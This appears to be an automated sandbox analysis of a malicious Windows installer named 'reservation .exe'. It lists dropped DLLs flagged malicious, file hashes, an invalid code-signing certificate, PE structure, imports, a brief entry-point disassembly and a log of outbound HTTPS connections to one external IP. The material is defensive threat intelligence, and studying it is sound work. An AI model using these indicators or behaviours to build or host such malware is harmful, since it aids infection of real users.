                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1388688
                                                                                                                          Entropy (8bit):6.85745413435775
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:vNaU+KpPikndiNfzN4jH3PlMQzMjYpOtJqTp/kqg1+:xlUfzN4jH3PlyjYpOLqd/kP1+
                                                                                                                          MD5:3B838DC25E96877A1852966F75A5C44A
                                                                                                                          SHA1:555E1830829B008D66FF591D87AC235F6286AB9A
                                                                                                                          SHA-256:292C9367E5F978D2085192B85BCFEA7DF3A033172703BCCF1FF28A74D65D5AC1
                                                                                                                          SHA-512:B5A7F05CD721FC75B77BB33528F746E865C2277A32F3AA312A974DE903A817B7C83E7698980A496B5D04595B21926E94CF9F70A15CD0882D57BA25014BA775D6
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):713456
                                                                                                                          Entropy (8bit):6.620067101616198
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:RPCS0cSUktNimb/JZqNFcbJ3bZJNlvI8CjBMUC6eVc4/SK:RPCS0c1ktNimbqYZJNlvVc4L
                                                                                                                          MD5:96D413CAAF8C7793A96EF200F6695922
                                                                                                                          SHA1:ABFB19A5BEA8724A08A3C709B68C65178E8EFBE5
                                                                                                                          SHA-256:5C6E5346C4EF80E1DD211BD5519311ACA01025CE1D3811113A03E657938F370D
                                                                                                                          SHA-512:93BF7AC89AE64948C3E91294DE89478B0F92D9CEFB71C803ABB324E181D783801C87DD6D806B0DB0D3737B3330E37993AE07B9B7D5AACCA9F9F5C3556E23EEE4
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):541880
                                                                                                                          Entropy (8bit):5.766958615909
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:ghUZvMdmP9OwMJvP2jkIgEIdwKADpiw7FCPU2lvzTNl:BhMsPG2udwLdigFyU2lvzTNl
                                                                                                                          MD5:753B75570811052953F336261E3031BB
                                                                                                                          SHA1:2244CCE49368180C1CF6BCA0C57DAEC71401C4F7
                                                                                                                          SHA-256:603C5FD4E29C14DF02937DF765BF76E067A7A4706130D93F947106D0AE09A9DE
                                                                                                                          SHA-512:6C81B813A79077E7157CF7F647A1F3C31A71098037C7003BC40B70E4AADAFCF490FDC01C71A26F8FED8C97BA33B41DF5B8A0D479DA951459CBD56421705813C5
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):970912
                                                                                                                          Entropy (8bit):6.9649735952029515
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                          MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                          SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                          SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                          SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                          Malicious:false
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):370488
                                                                                                                          Entropy (8bit):6.86993159214619
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:wJ9LiOhPhz85popbbFb06wAQAwq961b/v9MkvCq2/JO+UxK6DvX0C7Uxm//f0Ps7:IBi8q5po9JkyICq2/z6DvsyEE5+PgAEX
                                                                                                                          MD5:82E49683F540F78B2D1759CDE594482F
                                                                                                                          SHA1:352DCBDBBB3C5C927B83389E2AB7F40B66EE716A
                                                                                                                          SHA-256:55D99ECD7F821A4B2FE7E5A0B2CEA213DC79004C1DC413BD003F032C61080576
                                                                                                                          SHA-512:F50A3BCD5905103EEC344D7DAF1C17896DF9039D3E8D5E9BBD771F1E235EC6045D626ED838C9BF3A8F7A66AA5F41F0743EA7D9BDEF7492DA8B36561089E126BF
                                                                                                                          Malicious:true
                                                                                                                          Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1074302464
                                                                                                                          Entropy (8bit):0.007609102467218604
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:
                                                                                                                          MD5:1E2570A7DD0C8452B18340E4386C1FA3
                                                                                                                          SHA1:FE1D6D0D86171E8F9AE64A909C4ADCCA13267B20
                                                                                                                          SHA-256:DACBF6D62555C6A75AEEBF978388AB320D3F2B283240C936B82ABD9318ADD699
                                                                                                                          SHA-512:02951D9CD5E88D91A10524D811D5673A2A98DB5EB21E97A1273900625A932DD933B82B60B09C5FE28381890471A7B40388CA3ACD84D5FE42BF9A4B4693727F72
                                                                                                                          Malicious:true
                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Entropy (8bit):7.95694747974766
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 98.45%
                                                                                                                          • Inno Setup installer (109748/4) 1.08%
                                                                                                                          • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                                                                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                          File name:reservation .exe
                                                                                                                          File size:7'988'632 bytes
                                                                                                                          MD5:ded33758f9470a6ee7ccaba58301f651
                                                                                                                          SHA1:b4b43213b8ba2e83de9344ecb038811c1636d864
                                                                                                                          SHA256:165002986f77081f5cf1a411a8efa39219b359fa2245b563140c9d09e8ed6765
                                                                                                                          SHA512:a37ca941e4600b6cf5475a632580603bdb77a9c8d7ba36fa742dd49cd1d6e11134144910ea4f507de7411d3b2b00105c0935a617259dd2fec729ad991f746df3
                                                                                                                          SSDEEP:196608:fK2TldGPLBnNx2Dnm7sJQi1xEssjtPdWwx9PDXirAOL:y2ch32DDxEs+PowTb7U
                                                                                                                          TLSH:CD86223FB268753EC9AE4B314973836099BB7761B81A8C1E07F4084DCF665B01E3B656
                                                                                                                          File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                          Icon Hash:0b1212121362621b
                                                                                                                          Entrypoint:0x4b5eec
                                                                                                                          Entrypoint Section:.itext
                                                                                                                          Digitally signed:true
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x63ECF218 [Wed Feb 15 14:54:16 2023 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:6
                                                                                                                          OS Version Minor:1
                                                                                                                          File Version Major:6
                                                                                                                          File Version Minor:1
                                                                                                                          Subsystem Version Major:6
                                                                                                                          Subsystem Version Minor:1
                                                                                                                          Import Hash:e569e6f445d32ba23766ad67d1e3787f
                                                                                                                          Signature Valid:false
                                                                                                                          Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                                                                                                          Signature Validation Error:The digital signature of the object did not verify
                                                                                                                          Error Number:-2146869232
                                                                                                                          Not Before, Not After
                                                                                                                          • 10/10/2022 15:18:04 11/10/2023 15:18:04
                                                                                                                          Subject Chain
                                                                                                                          • E=support@rostpay.ru, CN=ROSTPAY LLC, O=ROSTPAY LLC, STREET="Dolomanovsky lane, 70D apt.1 (10th floor)", L=Rostov-on-Don, S=Rostov Oblast, C=RU, OID.1.3.6.1.4.1.311.60.2.1.2=Rostov oblast, OID.1.3.6.1.4.1.311.60.2.1.3=RU, SERIALNUMBER=1086168004669, OID.2.5.4.15=Private Organization
                                                                                                                          Version:3
                                                                                                                          Thumbprint MD5:DA8497E3277C9E572DB41EC027529554
                                                                                                                          Thumbprint SHA-1:06DA93A00B5C193261A4FAE08023F5413C67844E
                                                                                                                          Thumbprint SHA-256:0A83E225C67ED631DB487C6E0CA17F97063DBF82367217C13BF443FCB0361633
                                                                                                                          Serial:11F9BA50B5DD4CACE858ECEC
                                                                                                                          Instruction
                                                                                                                          push ebp
                                                                                                                          mov ebp, esp
                                                                                                                          add esp, FFFFFFA4h
                                                                                                                          push ebx
                                                                                                                          push esi
                                                                                                                          push edi
                                                                                                                          xor eax, eax
                                                                                                                          mov dword ptr [ebp-3Ch], eax
                                                                                                                          mov dword ptr [ebp-40h], eax
                                                                                                                          mov dword ptr [ebp-5Ch], eax
                                                                                                                          mov dword ptr [ebp-30h], eax
                                                                                                                          mov dword ptr [ebp-38h], eax
                                                                                                                          mov dword ptr [ebp-34h], eax
                                                                                                                          mov dword ptr [ebp-2Ch], eax
                                                                                                                          mov dword ptr [ebp-28h], eax
                                                                                                                          mov dword ptr [ebp-14h], eax
                                                                                                                          mov eax, 004B14B8h
                                                                                                                          call 00007F99D1496F95h
                                                                                                                          xor eax, eax
                                                                                                                          push ebp
                                                                                                                          push 004B65E2h
                                                                                                                          push dword ptr fs:[eax]
                                                                                                                          mov dword ptr fs:[eax], esp
                                                                                                                          xor edx, edx
                                                                                                                          push ebp
                                                                                                                          push 004B659Eh
                                                                                                                          push dword ptr fs:[edx]
                                                                                                                          mov dword ptr fs:[edx], esp
                                                                                                                          mov eax, dword ptr [004BE634h]
call 00007F99D1539A87h
call 00007F99D15395DAh
lea edx, dword ptr [ebp-14h]
xor eax, eax
call 00007F99D14ACA34h
mov edx, dword ptr [ebp-14h]
mov eax, 004C1D84h
call 00007F99D1491B87h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [004C1D84h]
mov dl, 01h
mov eax, dword ptr [004238ECh]
call 00007F99D14ADBB7h
mov dword ptr [004C1D88h], eax
xor edx, edx
push ebp
push 004B654Ah
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007F99D1539B0Fh
mov dword ptr [004C1D90h], eax
mov eax, dword ptr [004C1D90h]
cmp dword ptr [eax+0Ch], 01h
jne 00007F99D153FD2Ah
mov eax, dword ptr [004C1D90h]
mov edx, 00000028h
call 00007F99D14AE4ACh
mov edx, dword ptr [004C1D90h]
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0xc4000          0x9a          .edata
IMAGE_DIRECTORY_ENTRY_IMPORT          0xc2000          0xfdc         .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc7000          0xcf84        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x79bbd0         0x29c8
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0xc6000          0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0xc22f4          0x254         .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0xc3000          0x1a4         .didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name     Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity      File Type  Entropy             Characteristics
.text    0x1000           0xb39e4       0xb3a00   43af0a9476ca224d8e8461f1e22c94da  False     0.34525867693110646  data       6.357635049994181   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext   0xb5000          0x1688        0x1800    185e04b9a1f554e31f7f848515dc890c  False     0.54443359375        data       5.971425428435973   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data    0xb7000          0x37a4        0x3800    cab2107c933b696aa5cf0cc6c3fd3980  False     0.36097935267857145  data       5.048648594372454   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss     0xbb000          0x6de8        0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata   0xc2000          0xfdc         0x1000    e7d1635e2624b124cfdce6c360ac21cd  False     0.3798828125         data       5.029087481102678   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata  0xc3000          0x1a4         0x200     8ced971d8a7705c98b173e255d8c9aa7  False     0.345703125          data       2.7509822285969876  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata   0xc4000          0x9a          0x200     8d4e1e508031afe235bf121c80fd7d5f  False     0.2578125            data       1.877162954504408   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls     0xc5000          0x18          0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                    empty      0.0                 IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata   0xc6000          0x5d          0x200     8f2f090acd9622c88a6a852e72f94e96  False     0.189453125          data       1.3838943752217987  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc    0xc7000          0xcf84        0xd000    79b14998a5ff92ba07776386085e959a  False     0.5243952824519231   data       6.317919630549471   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name           RVA      Size    Type                                                            Language  Country        ZLIB Complexity
RT_ICON        0xc74f8  0x1ca8  Device independent bitmap graphic, 48 x 96 x 24, image size 0   English   United States  0.3136586695747001
RT_ICON        0xc91a0  0x434c  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced     English   United States  0.961864406779661
RT_ICON        0xcd4ec  0x25a8  Device independent bitmap graphic, 48 x 96 x 32, image size 0   English   United States  0.25881742738589214
RT_ICON        0xcfa94  0x10a8  Device independent bitmap graphic, 32 x 64 x 32, image size 0   English   United States  0.3428705440900563
RT_ICON        0xd0b3c  0x468   Device independent bitmap graphic, 16 x 32 x 32, image size 0   English   United States  0.5398936170212766
RT_STRING      0xd0fa4  0x360   data                                                                                     0.34375
RT_STRING      0xd1304  0x260   data                                                                                     0.3256578947368421
RT_STRING      0xd1564  0x45c   data                                                                                     0.4068100358422939
RT_STRING      0xd19c0  0x40c   data                                                                                     0.3754826254826255
RT_STRING      0xd1dcc  0x2d4   data                                                                                     0.39226519337016574
RT_STRING      0xd20a0  0xb8    data                                                                                     0.6467391304347826
RT_STRING      0xd2158  0x9c    data                                                                                     0.6410256410256411
RT_STRING      0xd21f4  0x374   data                                                                                     0.4230769230769231
RT_STRING      0xd2568  0x398   data                                                                                     0.3358695652173913
RT_STRING      0xd2900  0x368   data                                                                                     0.3795871559633027
RT_STRING      0xd2c68  0x2a4   data                                                                                     0.4275147928994083
RT_RCDATA      0xd2f0c  0x10    data                                                                                     1.5
RT_RCDATA      0xd2f1c  0x2c4   data                                                                                     0.6384180790960452
RT_RCDATA      0xd31e0  0x2c    data                                                                                     1.2045454545454546
RT_GROUP_ICON  0xd320c  0x4c    data                                                            English   United States  0.8289473684210527
RT_VERSION     0xd3258  0x584   data                                                            English   United States  0.24079320113314448
RT_MANIFEST    0xd37dc  0x7a8   XML 1.0 document, ASCII text, with CRLF line terminators        English   United States  0.3377551020408163
DLL           Import
kernel32.dll  GetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll  InitCommonControls
version.dll   GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
user32.dll    CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll  SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
netapi32.dll  NetWkstaGetInfo, NetApiBufferFree
advapi32.dll  ConvertStringSecurityDescriptorToSecurityDescriptorW, RegQueryValueExW, AdjustTokenPrivileges, GetTokenInformation, ConvertSidToStringSidW, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW
Name                            Ordinal  Address
TMethodImplementationIntercept  3        0x4541a8
__dbk_fcall_wrapper             2        0x40d0a0
dbkFCallWrapperAddr             1        0x4be63c
Language of compilation system  Country where language is spoken  Map
English                         United States
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Nov 19, 2024 19:15:13.046997070 CET  49979        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:13.047033072 CET  443          49979      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:13.047086954 CET  49979        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:13.062104940 CET  49979        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:13.062122107 CET  443          49979      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:13.859060049 CET  443          49979      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:13.859237909 CET  49979        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:13.861090899 CET  49979        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:13.861094952 CET  443          49979      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:13.861361027 CET  443          49979      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:13.903965950 CET  49979        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:13.950761080 CET  49979        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:13.950982094 CET  443          49979      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:13.951018095 CET  443          49979      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:13.951085091 CET  49979        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:13.951091051 CET  443          49979      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:13.951137066 CET  49979        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:13.951137066 CET  49979        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:13.951159000 CET  49979        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:14.039877892 CET  49982        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:14.039901018 CET  443          49982      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:14.040213108 CET  49982        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:14.041378021 CET  49982        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:14.041393995 CET  443          49982      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:14.893179893 CET  443          49982      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:14.893279076 CET  49982        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:14.895759106 CET  49982        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:14.895766020 CET  443          49982      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:14.896235943 CET  443          49982      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:14.896863937 CET  49982        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:14.898350000 CET  49982        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:14.898411989 CET  443          49982      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:14.898530006 CET  443          49982      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:14.898557901 CET  443          49982      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:14.898610115 CET  49982        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:14.899285078 CET  49982        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:14.953567028 CET  49985        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:14.953607082 CET  443          49985      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:14.953826904 CET  49985        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:14.957472086 CET  49985        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:14.957484961 CET  443          49985      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:15.698044062 CET  443          49985      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:15.698153973 CET  49985        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:15.699563980 CET  49985        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:15.699570894 CET  443          49985      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:15.700472116 CET  443          49985      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:15.701195955 CET  49985        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:15.701754093 CET  49985        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:15.701809883 CET  443          49985      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:15.701880932 CET  49985        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:15.702080965 CET  443          49985      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:15.702136993 CET  49985        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:15.761287928 CET  49988        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:15.761326075 CET  443          49988      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:15.761435986 CET  49988        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:15.761989117 CET  49988        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:15.762003899 CET  443          49988      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:16.596705914 CET  443          49988      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:16.596826077 CET  49988        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:16.598660946 CET  49988        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:16.598675013 CET  443          49988      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:16.598969936 CET  443          49988      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:16.599814892 CET  49988        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:16.600634098 CET  49988        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:16.600670099 CET  443          49988      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:16.600752115 CET  49988        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:16.600766897 CET  443          49988      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:16.600799084 CET  443          49988      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:16.600893974 CET  49988        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:16.600893974 CET  49988        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:16.619549990 CET  49991        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:16.619592905 CET  443          49991      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:16.619752884 CET  49991        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:16.620034933 CET  49991        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:16.620055914 CET  443          49991      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:17.354590893 CET  443          49991      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:17.354676962 CET  49991        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:17.360331059 CET  49991        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:17.360347033 CET  443          49991      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:17.360615015 CET  443          49991      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:17.361396074 CET  49991        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:17.362396002 CET  49991        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:17.362422943 CET  443          49991      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:17.362540007 CET  443          49991      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:17.362560987 CET  49991        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:17.362571001 CET  443          49991      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:17.362586975 CET  49991        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:17.362617016 CET  49991        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:17.423849106 CET  49994        443        192.168.2.5     212.193.169.65
Nov 19, 2024 19:15:17.423882008 CET  443          49994      212.193.169.65  192.168.2.5
Nov 19, 2024 19:15:17.423990011 CET  49994        443        192.168.2.5     212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:17.424407959 CET49994443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:17.424426079 CET44349994212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:18.223351002 CET44349994212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:18.223416090 CET49994443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:18.224981070 CET49994443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:18.224994898 CET44349994212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:18.225392103 CET44349994212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:18.226123095 CET49994443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:18.226706028 CET49994443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:18.226737976 CET44349994212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:18.226835966 CET49994443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:18.226874113 CET44349994212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:18.226918936 CET44349994212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:18.226946115 CET49994443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:18.226982117 CET49994443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:18.237385988 CET49997443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:18.237432003 CET44349997212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:18.237497091 CET49997443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:18.238044977 CET49997443192.168.2.5212.193.169.65
                                                                                                                          Nov 19, 2024 19:15:18.238059998 CET44349997212.193.169.65192.168.2.5
                                                                                                                          Nov 19, 2024 19:15:19.031642914 CET44349997212.193.169.65192.168.2.5
